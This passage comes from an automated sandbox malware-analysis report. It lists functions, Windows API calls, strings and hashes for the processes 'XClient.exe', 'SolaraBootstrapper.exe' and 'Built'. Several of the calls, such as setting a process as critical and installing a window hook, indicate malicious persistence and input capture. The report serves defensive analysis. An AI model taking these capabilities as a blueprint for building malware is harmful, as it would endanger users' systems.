Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C872C

CreateSymbolicLinkW.KERNEL32(?,00007FF76D5C11A7), ref: 00007FF76D5C411B
GetLastError.KERNEL32 ref: 00007FF76D5C412E

Strings

[oV116, xrefs: 00007FF76D5C40B3

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ByteCharMultiWide$CreateErrorLastLinkSymbolic
String ID: [oV116
API String ID: 1423938079-247592185
Opcode ID: f4a98f2b695cc099850f883339abc80f8baf895b83380dd6bddf53da4f0bd991
Instruction ID: a40d9f6efd513514c5a27f64b4fdb419218837cc9bef08ced83e5c1d617395cb
Opcode Fuzzy Hash: f4a98f2b695cc099850f883339abc80f8baf895b83380dd6bddf53da4f0bd991
Instruction Fuzzy Hash: 2B119D61A2C682C1FA20BB11A4447B9A2A5AF1C781FC40039DE9D56F87FE3CE5488E31

Function 00007FF76D5CF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF76D5CF0B8
RaiseException.KERNEL32 ref: 00007FF76D5CF0F9

Strings

csm, xrefs: 00007FF76D5CF0E6

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 2208e2ca89cdb8591cc6fd828f02bf8c8e24d4a21ad73fb7a40a641dd933d887
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: D111493662DB8582EB219B15E440269B7E0FB88B89F984234DE8D07B69EF3CC5518B10

Function 00007FF76D5D4C34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D4B49), ref: 00007FF76D5D4C67
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D4B49), ref: 00007FF76D5D4C7D

Strings

[oV116, xrefs: 00007FF76D5D4C38

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID: [oV116
API String ID: 1707611234-247592185
Opcode ID: 885b147e6b65c9f36e7e75731fd1a19d48845f052dfaffbc4ee39426e9b27c1b
Instruction ID: 84884dae8713d57ed8c154fa9b259f0d7eca3b2006595357354648559d67ca4d
Opcode Fuzzy Hash: 885b147e6b65c9f36e7e75731fd1a19d48845f052dfaffbc4ee39426e9b27c1b
Instruction Fuzzy Hash: E4118F2161C692C1EB64AB11A41103EF7A1FB89765F900235FEAD81EE9FF2CD014DB20

Function 00007FF76D5C7E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69

Part of subcall function 00007FF76D5C8760: WideCharToMultiByte.KERNEL32(?,?,00007FF76D5C34B3,?,00007FF76D5C3534), ref: 00007FF76D5C87A8

Strings

[oV116, xrefs: 00007FF76D5C7E1D

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ByteCharEnvironmentMultiWide$ExpandStringsVariable
String ID: [oV116
API String ID: 1103021425-247592185
Opcode ID: 8faec15fd92c035058c17447badd45038b2d3dc0e4a8fa448e2071833699defb
Instruction ID: 2b81ae56ec7a307f02ea565533adf47b34f5ae4e68ce9b7e4ca3aba71878a395
Opcode Fuzzy Hash: 8faec15fd92c035058c17447badd45038b2d3dc0e4a8fa448e2071833699defb
Instruction Fuzzy Hash: 7B018456F2C696C1FB30BB21E4593BA9255EB98785FC04035DB4D92D86ED3CD1048F24

Function 00007FF76D5C26C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF76D5C2736

Strings

Error, xrefs: 00007FF76D5C2728
[oV116, xrefs: 00007FF76D5C26DC

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Error$[oV116
API String ID: 2030045667-1857628245
Opcode ID: 4e05cee4fd0387c749ad16b8ffcff93906d9d1e3285c9c5f37b12be0ab4e678e
Instruction ID: 0762a9370db49c87abef8da2236226eac29239709df71e9119794b328b6963ec
Opcode Fuzzy Hash: 4e05cee4fd0387c749ad16b8ffcff93906d9d1e3285c9c5f37b12be0ab4e678e
Instruction Fuzzy Hash: 23018F32628B81C1E720AB10F455BA973A8FB88BC4F914035DE9C17A46DF3DD615CB50

Function 00007FF76D5C2940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF76D5C29B6

Strings

[oV116, xrefs: 00007FF76D5C295C
Warning, xrefs: 00007FF76D5C29A8

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Warning$[oV116
API String ID: 2030045667-1833381359
Opcode ID: 30b688256be6176580ba4bf51bf18ff376a5b504d8ca08eaaab4825b13796874
Instruction ID: 570779e5b175e6f350ca577625d5769d6b94130dc2bae878b6e56facfd033325
Opcode Fuzzy Hash: 30b688256be6176580ba4bf51bf18ff376a5b504d8ca08eaaab4825b13796874
Instruction Fuzzy Hash: 22018F32628B81C1E720AB10F455BA973A8FB88BC4F914035DE9C57A46DF3DD615CB50

Function 00007FFDF759DAE0 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

winShmMap2, xrefs: 00007FFDF759DC20
winShmMap1, xrefs: 00007FFDF759DBCF
winFileSize, xrefs: 00007FFDF759DBA1
winShmMap3, xrefs: 00007FFDF759DD39

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID: 00007E133019
String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
API String ID: 3999650332-2257004166
Opcode ID: c0812779f35bdf8fb4ff101661a4324d3c7486eb6dbe2245d40ced781f00964f
Instruction ID: af853720f02ca73240658f300d75e072fa3873901d786e87f8d35dd1f442362b
Opcode Fuzzy Hash: c0812779f35bdf8fb4ff101661a4324d3c7486eb6dbe2245d40ced781f00964f
Instruction Fuzzy Hash: 6481807AB0874286EBA19F24D420AA977B2FB88B98F544135DE5D477DDDF3CD8018B40

Function 00007FFDF75E98C0 Relevance: 5.1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

*?[, xrefs: 00007FFDF75E9956, 00007FFDF75E997C, 00007FFDF75E99C5
sz=[0-9]*, xrefs: 00007FFDF75E9986
noskipscan*, xrefs: 00007FFDF75E99CF
unordered*, xrefs: 00007FFDF75E9960

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: c3a0c4bb02d0cc88bbfcb6bdef12194fa9fb737831e58f40694e07a1dd3468d1
Instruction ID: 750cda95f4407dbf37f62f8a32b301f745ae377b9a5b7fe5cafc8ecb7e7a1e74
Opcode Fuzzy Hash: c3a0c4bb02d0cc88bbfcb6bdef12194fa9fb737831e58f40694e07a1dd3468d1
Instruction Fuzzy Hash: E641F56AB0C69246FB22CB15E5609F977A4EF41B84F841032DAAD877DEDF2CE505C701

Function 00007FFDF75CE966 Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

cannot rollback - no transaction is active, xrefs: 00007FFDF75CEA3F
cannot commit - no transaction is active, xrefs: 00007FFDF75CEA46
cannot start a transaction within a transaction, xrefs: 00007FFDF75CEA34
cannot commit transaction - SQL statements in progress, xrefs: 00007FFDF75CE9A5

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
String ID: cannot commit - no transaction is active$cannot commit transaction - SQL statements in progress$cannot rollback - no transaction is active$cannot start a transaction within a transaction
API String ID: 0-3785649666
Opcode ID: ec8afc50874c8b374021a13efecbf03a1c2bc4e578d83d22d797aacaf1fc7505
Instruction ID: 0def4582598c097e56f79499f426459b26cbcedbf1076027ed84dc133974deeb
Opcode Fuzzy Hash: ec8afc50874c8b374021a13efecbf03a1c2bc4e578d83d22d797aacaf1fc7505
Instruction Fuzzy Hash: 3831D23AB092A686EB958B2584A4FFA23E5EF41790F515431DA3E577C8DE7CE800C700

Function 00007FFDF75C4880 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

API called with finalized prepared statement, xrefs: 00007FFDF75C48A7
df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24, xrefs: 00007FFDF75C48B6
%s at line %d of [%.10s], xrefs: 00007FFDF75C48CF
misuse, xrefs: 00007FFDF75C48C3

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$misuse
API String ID: 0-2403070753
Opcode ID: 2c17204bd465ef3aa51da54f296ed20640a67656409ad0f85c034fd7c71ddaae
Instruction ID: 88bd688cbc2b0a6b5fdc2d23d55302c07db760662984c14babd3aaf6ec184811
Opcode Fuzzy Hash: 2c17204bd465ef3aa51da54f296ed20640a67656409ad0f85c034fd7c71ddaae
Instruction Fuzzy Hash: 81219029F0C61282EF52DB25E160FF967B1AF45B98F440031DA2D47BDADF2CE4958740

Analysis Process: XClient.exePID: 7216, Parent PID: 5768COMMON

Executed Functions

Function 00007FFD9B2A149F Relevance: 1.7, APIs: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580069804fe27d39a6bc7a7a718d038518c0e56009e571898c1820356d735bae
Instruction ID: 9d6faafd36cc4a00f6e61fe9377e5824a618a532aecd72436e248a0a6bfde75e
Opcode Fuzzy Hash: 580069804fe27d39a6bc7a7a718d038518c0e56009e571898c1820356d735bae
Instruction Fuzzy Hash: 5B514932B08A298FD714BF9DE855AE9B7E0FF95372F04413FD18AC7282DA64644687D0

Function 00007FFD9B2A3221 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B2A32F2

Memory Dump Source

Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 8636694b994b954f08a80243552a830c01c3ea84999102bc60a8265e046130c7
Instruction ID: 321144bdf28ec6fe5e4757938d05b7d5c047cebe3407129d5914fc548138a582
Opcode Fuzzy Hash: 8636694b994b954f08a80243552a830c01c3ea84999102bc60a8265e046130c7
Instruction Fuzzy Hash: 1641233190C6588FDB29DFA8D856AFA7BF0FF56311F14416FE08AC3592CB646842CB91

Function 00007FFD9B2A3438 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9B2A3501

Memory Dump Source

Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7cbcd626ff589d2f4373add5d491170de67612b6b37a4f7a365a298ea942133f
Instruction ID: 913d04fc997ef5a44bc7d037aba912dd4eec69eb961d20766a26fae4674bab61
Opcode Fuzzy Hash: 7cbcd626ff589d2f4373add5d491170de67612b6b37a4f7a365a298ea942133f
Instruction Fuzzy Hash: D041F531A1CA4D4FDB58EF6C98566F9BBE1EB59321F10427ED059C32D2CE64A8128781

Analysis Process: SolaraBootstrapper.exePID: 7248, Parent PID: 5768COMMON

Executed Functions

Function 00AD0890 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059416c97a2bfb16dfa82a9fe3fe3943dcb849ef247879baca4e55a2c5bbc6e7
Instruction ID: 5aa07da274050bd00151dee913701d89230d38e1e443cb2e458ec3a861105ce9
Opcode Fuzzy Hash: 059416c97a2bfb16dfa82a9fe3fe3943dcb849ef247879baca4e55a2c5bbc6e7
Instruction Fuzzy Hash: A3F1F274D05229CFDB28DF65D984BEDBBB2FB8A300F1095AA944AA7354DB305E85CF00

Function 00AD0880 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13348947f947de0ba2fea8c8ca44795162d17cdc2863eefe559a806febd3d188
Instruction ID: 7130f70bf20dda4cf9746a918f3df9323875c6ea3da90fccac4341a3e03bf030
Opcode Fuzzy Hash: 13348947f947de0ba2fea8c8ca44795162d17cdc2863eefe559a806febd3d188
Instruction Fuzzy Hash: BBE10574D05229CFDB28DF65D988BDDBBB2FB89300F1095AA845AA7264DB705E85CF00

Function 00AD246D Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e9534b1b083296dba43f39b2c61883032eaa05a17363e164cf32bab53648aa
Instruction ID: e9252f83cb30d27a973f6f939ec96d916922068661c71d847369d60704fe35c6
Opcode Fuzzy Hash: 18e9534b1b083296dba43f39b2c61883032eaa05a17363e164cf32bab53648aa
Instruction Fuzzy Hash: 79011978D08248EFCB16DFB4D4446ADBFB1EF4A300F1085AAD859A7266E7355A42CF41

Function 00AD09C5 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0bd9d51eef2506a45868c6ce8d3c446b4db4e163f57d5f02be0188738de7b5
Instruction ID: 611d285d89fcb3b4b4a7e4d6ea2d6077eacb6502a4eb98f71a14eb53f043d8b6
Opcode Fuzzy Hash: 9a0bd9d51eef2506a45868c6ce8d3c446b4db4e163f57d5f02be0188738de7b5
Instruction Fuzzy Hash: BEC1F274D05229CFDB28EF60D988BEDBBB1FB4A300F2055AAC45AA7254DB705E85CF14

Function 00AD0A94 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2afc51a96529bdfe0fb4d78b43055aef50a3c9555a4aa78794b204a5214522b
Instruction ID: 03d1312771e644e8875e0d35d44a9b2c1c92939acd87345bdf91e2787b9831c0
Opcode Fuzzy Hash: c2afc51a96529bdfe0fb4d78b43055aef50a3c9555a4aa78794b204a5214522b
Instruction Fuzzy Hash: 0FC1F374D05229CFCB28EF60D988BEDBBB1FB4A301F1055AA849AA7354DB705E85CF04

Function 00AD0DE2 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d591c0e6a5cf25a49075b1f623ef801d4ed5de20f755d0997b46a202939b82a
Instruction ID: ed9a6dc5fceea4ea76f2f8d35049fb1369d96128197ee219d6c9e32f95e3a742
Opcode Fuzzy Hash: 9d591c0e6a5cf25a49075b1f623ef801d4ed5de20f755d0997b46a202939b82a
Instruction Fuzzy Hash: A1413874D052298FCB65EF64C858BEDBBB1FB4A300F2058AAD04AA7354DB304E95CF44

Function 00AD1050 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d81a1255513a2832da4183c1631d225ee024af4b1eb3e53e8c2ccd19d44c7cf0
Instruction ID: ec8cdc771cdaeb5a8c15c0d18a5d469bdbeaa220dcb329354f95e9d9f98cf874
Opcode Fuzzy Hash: d81a1255513a2832da4183c1631d225ee024af4b1eb3e53e8c2ccd19d44c7cf0
Instruction Fuzzy Hash: C041F674E05208AFDB54DFA9D890AADBBB2FF89300F10852EE845BB355DB305846CF40

Function 00A7D214 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1753934685.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a7d000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 719bcc754e650ccfd0a2f47fca12a3990b552162bebbdbb681420a49dc58e80c
Instruction ID: bf8843dd554538be3a54ec58c24f6dcbe940403634ca0f6247a6610e9e3947cb
Opcode Fuzzy Hash: 719bcc754e650ccfd0a2f47fca12a3990b552162bebbdbb681420a49dc58e80c
Instruction Fuzzy Hash: A721BDB6604340EFCB059F54DD84B66BBB6FF98324F24C569E90D0A246C336D817DBA1

Function 00A7D20F Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1753934685.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a7d000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction ID: 03aea56c0cfcd7f20d4c5b795a6e184e2332016d2f7e5cd5b8ff886294d47a7d
Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction Fuzzy Hash: 1A219D76504280DFCB06CF54D9C4B56BF72FB88324F24C5A9D9090A656C33AD81ACBA1

Function 00AD1273 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b9d6d11b6807c2a9cfb749c58125b842ae02ac4dc8d957f12f57c761be4aec
Instruction ID: 1190db771362a6413c2af5b9f83e2280b51147ccd26fb288f816cd6350ee7a37
Opcode Fuzzy Hash: 63b9d6d11b6807c2a9cfb749c58125b842ae02ac4dc8d957f12f57c761be4aec
Instruction Fuzzy Hash: E9F0B278E002199FCB64DFA8D880A9CBBB0FF88310F1084AAD519E7320DB309940CF00

Function 00AD0FC8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f1403e245d045f38b390a45c4b641d8a6c687bfb45a596cbfa23fc90e96f19
Instruction ID: b3c645c0d69c16e8b1297d2c2cbfc2d54e3ac2ae47a8b91fa34ead2b940b0e7c
